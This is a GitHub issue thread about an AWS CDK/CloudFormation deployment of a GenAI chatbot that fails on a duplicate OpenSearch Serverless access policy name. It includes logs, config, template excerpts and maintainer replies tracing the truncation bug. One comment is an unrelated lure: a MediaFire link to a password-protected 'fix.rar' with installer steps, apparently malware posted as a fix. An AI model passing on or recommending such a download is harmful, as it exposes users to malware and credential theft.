### ISSUE TITLE
Deployment Failure: Conflict with Existing Access Policy in CloudFormation Stack for OpenSearch RAG deployement

### ISSUE THREAD

**Issue by michel-heon** [aws-samples/aws-genai-llm-chatbot#556]
**Description**:
During the deployment of the `anonyme-GenAIChatBotStack` using AWS CloudFormation, we encountered a failure due to a conflict with an already existing access policy resource.

**Error Message**:
```
CREATE_FAILED AWS::OpenSearchServerless::AccessPolicy anonyme/OpenSearchVector/AccessPolicy-delete-workspace (anonymeOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB) 
data|anonyme-access-policy-d already exists in stack arn:aws:cloudformation:us-east-1:123456789012:stack/anonyme-GenAIChatBotStack/eab48680-6477-11ef-8ac0-0e4c48c4ca71
```
**Trace Log**:
```
anonyme-GenAIChatBotStack | 346/350 | 9:46:50 AM | CREATE_COMPLETE      | AWS::AppSync::Resolver                          | ChatBotApi/ChatbotApi/listEmbeddingModels-resolver (ChatBotApiChatbotApilistEmbeddingModelsresolver17768F67) 
anonyme-GenAIChatBotStack | 347/350 | 9:47:18 AM | CREATE_COMPLETE      | AWS::AppSync::Resolver                          | ChatBotApi/ChatbotApi/listSessions-resolver (ChatBotApiChatbotApilistSessionsresolverDCF2BA04) 
anonyme-GenAIChatBotStack | 347/350 | 9:47:18 AM | CREATE_FAILED        | AWS::CloudFormation::Stack                      | anonyme-GenAIChatBotStack The following resource(s) failed to create: [RagEnginesOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB]. 

Failed resources:
anonyme-GenAIChatBotStack | 9:29:06 AM | CREATE_FAILED        | AWS::OpenSearchServerless::AccessPolicy         | RagEngines/OpenSearchVector/AccessPolicy-delete-workspace (RagEnginesOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB) data|anonyme-access-policy-d already exists in stack arn:aws:cloudformation:us-east-1:123456789012:stack/anonyme-GenAIChatBotStack/eab48680-6477-11ef-8ac0-0e4c48c4ca71

❌  anonyme-GenAIChatBotStack failed: Error: The stack named anonyme-GenAIChatBotStack failed to deploy: CREATE_FAILED (The following resource(s) failed to create: [RagEnginesOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB]. ): data|anonyme-access-policy-d already exists in stack arn:aws:cloudformation:us-east-1:123456789012:stack/anonyme-GenAIChatBotStack/eab48680-6477-11ef-8ac0-0e4c48c4ca71
    at FullCloudFormationDeployment.monitorDeployment (/home/ubuntu/PROJECT_PATH/node_modules/aws-cdk/lib/index.js:451:10568)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async Object.deployStack2 [as deployStack] (/home/ubuntu/PROJECT_PATH/node_modules/aws-cdk/lib/index.js:454:199515)
    at async /home/ubuntu/PROJECT_PATH/node_modules/aws-cdk/lib/index.js:454:181237

❌ Deployment failed: Error: The stack named anonyme-GenAIChatBotStack failed to deploy: CREATE_FAILED (The following resource(s) failed to create: [RagEnginesOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB]. ): data|anonyme-access-policy-d already exists in stack arn:aws:cloudformation:us-east-1:123456789012:stack/anonyme-GenAIChatBotStack/eab48680-6477-11ef-8ac0-0e4c48c4ca71
    at FullCloudFormationDeployment.monitorDeployment (/home/ubuntu/PROJECT_PATH/node_modules/aws-cdk/lib/index.js:451:10568)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async Object.deployStack2 [as deployStack] (/home/ubuntu/PROJECT_PATH/node_modules/aws-cdk/lib/index.js:454:199515)
    at async /home/ubuntu/PROJECT_PATH/node_modules/aws-cdk/lib/index.js:454:181237

The stack named anonyme-GenAIChatBotStack failed to deploy: CREATE_FAILED (The following resource(s) failed to create: [RagEnginesOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB]. ): data|anonyme-access-policy-d already exists in stack arn:aws:cloudformation:us-east-1:123456789012:stack/anonyme-GenAIChatBotStack/eab48680-6477-11ef-8ac0-0e4c48c4ca71
```

**Context**:
- The `config.json` file used to configure deployment settings includes the following configurations:
  ```json
  {
    "prefix": "anonyme-",
    "bedrock": {
      "enabled": true,
      "region": "us-east-1",
      "guardrails": {
        "enabled": false,
        "identifier": "",
        "version": "DRAFT"
      }
    },
    "llms": {
      "sagemaker": [],
      "huggingfaceApiSecretArn": ""
    },
    "rag": {
      "enabled": true,
      "engines": {
        "aurora": {
          "enabled": false
        },
        "opensearch": {
          "enabled": true
        },
        "kendra": {
          "enabled": false,
          "createIndex": false,
          "external": [],
          "enterprise": false
        },
        "knowledgeBase": {
          "enabled": true,
          "external": []
        }
      },
      "embeddingsModels": [
        {
          "provider": "sagemaker",
          "name": "intfloat/multilingual-e5-large",
          "dimensions": 1024
        }
      ],
      "crossEncoderModels": [
        {
          "provider": "sagemaker",
          "name": "cross-encoder/ms-marco-MiniLM-L-12-v2",
          "default": true
        }
      ]
    }
  }
  ```
- The CloudFormation template used for the deployment is defined in the `anonyme-GenAIChatBotStack.template.json` file.

**Steps to Reproduce**:
1. Trigger the deployment using the current CloudFormation template.
2. Monitor the deployment process.

**Expected Behavior**:
The stack deployment should proceed without any errors.

**Actual Behavior**:
The deployment fails due to the existence of an already present access policy in the stack, causing the creation of the resource `anonymeOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB` to fail.

**Environment**:
- AWS CloudFormation
- AWS OpenSearchServerless
- Commit ID 3075d2c8f569a53fac16582b2655ff7976d17a4a

**Additional Context**:
This issue is blocking the deployment of the chatbot stack. Any guidance or suggestions on resolving this conflict would be greatly appreciated.

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by charles-marion** [comment]
@michel-heon , I fixed something related here https://github.com/aws-samples/aws-genai-llm-chatbot/pull/549

After the change it should have renamed `anonyme-access-policy-d`  to prevent conflict.
https://github.com/charles-marion/aws-genai-llm-chatbot/blob/5d5e97d67d3a5085dcdb706599e2ee4c9019998d/tests/chatbot-api/__snapshots__/chatbot-api-construct.test.ts.snap#L10424

I would recommend to double check you are using the latest version. If yes I would revert to https://github.com/aws-samples/aws-genai-llm-chatbot/commit/dc31462bb981cf3ce6efed69c8456d7717c0552e and I can get a look when I have some time.

**Comment by michel-heon** [comment]
I moved to https://github.com/aws-samples/aws-genai-llm-chatbot/commit/dc31462bb981cf3ce6efed69c8456d7717c0552e 

It appears that the generated template (uqam-gpt-xprt-GenAIChatBotStack.template.json) does not accurately reflect the definition provided in chatbot-api-construct.test.ts.snap. Specifically, the discrepancies are as follows:

    Policy Name:
        In chatbot-api-construct.test.ts.snap, the policy name is defined as "prefix-access-policy-p".
        In the generated template, the policy name is "uqam-gpt-xprt--access-policy-del", which does not match the expected naming convention.

    Resource Index:
        The resource in chatbot-api-construct.test.ts.snap is defined as "index/prefix-genaichatbot-workspac/*".
        However, in the generated template, the resource is listed as "index/uqam-gpt-xprt--genaichatbot-/*", indicating a potential inconsistency in how the resource index is being resolved.

Furthermore, I have conducted a search through the codebase but have been unable to identify where the policy name "uqam-gpt-xprt--access-policy-del" is being generated. This makes it difficult to trace back the source of this inconsistency or to understand how the name is being derived.
The code segments are as follows
**chatbot-api-construct.test.ts.snap**
`
    "RagEnginesOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB": {
      "Properties": {
        "Name": "prefix-access-policy-p",
        "Policy": {
          "Fn::Join": [
            "",
            [
              "[{"Rules":[{"ResourceType":"index","Resource":["index/prefix-genaichatbot-workspac/*"],"Permission":["aoss:DeleteIndex","aoss:DescribeIndex","aoss:ReadDocument","aoss:WriteDocument"]}],"Principal":["",
              {
                "Fn::GetAtt": [
                  "RagEnginesWorkspacesDeleteWorkspaceDeleteWorkspaceFunctionServiceRoleD99F8BAF",
                  "Arn",
                ],
              },
              ""]}]",
            ],
          ],
        },
        "Type": "data",
      },
      "Type": "AWS::OpenSearchServerless::AccessPolicy",
    },
`
and **uqam-gpt-xprt-GenAIChatBotStack.template.json**
`
  "RagEnginesOpenSearchVectorAccessPolicydeleteworkspaceB7671EBB": {
   "Type": "AWS::OpenSearchServerless::AccessPolicy",
   "Properties": {
    "Name": "uqam-gpt-xprt--access-policy-del",
    "Policy": {
     "Fn::Join": [
      "",
      [
       "[{\"Rules\":[{\"ResourceType\":\"index\",\"Resource\":[\"index/uqam-gpt-xprt--genaichatbot-/*\"],\"Permission\":[\"aoss:DeleteIndex\",\"aoss:DescribeIndex\",\"aoss:ReadDocument\",\"aoss:WriteDocument\"]}],\"Principal\":[\"",
       {
        "Fn::GetAtt": [
         "RagEnginesWorkspacesDeleteWorkspaceDeleteWorkspaceFunctionServiceRoleD99F8BAF",
         "Arn"
        ]
       },
       "\"]}]"
      ]
     ]
    },
    "Type": "data"
   },
   "Metadata": {
    "aws:cdk:path": "uqam-gpt-xprt-GenAIChatBotStack/RagEngines/OpenSearchVector/AccessPolicy-delete-workspace"
   }
  },
  `

**Comment by charles-marion** [comment]
Hi @michel-heon ,

The string is generate here
https://github.com/charles-marion/aws-genai-llm-chatbot/blob/main/lib/rag-engines/workspaces/delete-workspace.ts#L92
which ends up here with `value = "delete-workspace-access-policy"` and `config.prefix = "uqam-gpt-xprt-"`
https://github.com/charles-marion/aws-genai-llm-chatbot/blob/main/lib/shared/utils.ts#L50

Before the fix the value would have been `value = "access-policy-delete-workspace"` which would cause conflicts when the prefix is too long (since it truncates the string).  (Note the unit test/snapshot prefix value is [prefix](https://github.com/charles-marion/aws-genai-llm-chatbot/blob/main/tests/utils/config-util.ts#L10)

Can you confirm you are using the last version with a clean workspace? (I recommend to re-clone and copy only the file `bin/config.json`) (or does it deploy with version https://github.com/aws-samples/aws-genai-llm-chatbot/commit/dc31462bb981cf3ce6efed69c8456d7717c0552e

This would make sure there is no stale file in your repository because the access policy in your example should be with the latest commit `uqam-gpt-xprt--delete-worskapace`

**Comment by charles-marion** [comment]
I agree you, I set the length to 10 but it should be 9.
It's not documented because it's now a constraint of the config generation cli here

https://github.com/charles-marion/aws-genai-llm-chatbot/blob/5d5e97d67d3a5085dcdb706599e2ee4c9019998d/cli/magic-config.ts#L260

Thank you for the investigation!

**Comment by charles-marion** [comment]
Please re-open if this is still happening.
